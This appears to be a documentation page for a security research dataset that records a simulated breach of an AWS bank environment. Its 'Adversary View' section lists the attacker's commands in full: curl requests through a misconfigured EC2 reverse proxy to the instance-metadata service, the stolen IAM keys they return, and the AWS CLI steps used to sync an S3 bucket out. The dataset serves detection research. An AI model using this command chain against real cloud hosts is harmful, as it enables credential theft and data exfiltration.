AWS Cloud Bank Breach S3
Contents
AWS Cloud Bank Breach S3#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2020/09/13 |
Modification Date |
2020/09/13 |
Tactics |
|
Techniques |
|
Tags |
EC2 Proxy Abuse,S3 Data Exfiltration |
Dataset Description#
This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.
Datasets Downloads#
Type |
Link |
---|---|
cloud |
Adversary View#
> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H "Host:169.254.169.254"
MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 >
> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H "Host:169.254.169.254"
{
"Code" : "Success",
"LastUpdated" : "2020-09-14T00:49:26Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIA5FLZVX4OPVKKVBMX",
"SecretAccessKey" : "aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03",
"Token" : "TOKEN",
"Expiration" : "2020-09-14T07:10:27Z"
}
> aws configure --profile erratic
AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX
AWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03
Default region name [None]: us-east-1
Default output format [None]: json
> echo aws_session_token = "TOKEN" >> ~/.aws/credentials
> aws s3 ls --profile erratic
2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642
2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a
> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26 89 ring.txt
> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26 89 ring.txt
> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic
download: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/aws/collection/ec2_proxy_s3_exfiltration.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.head(1)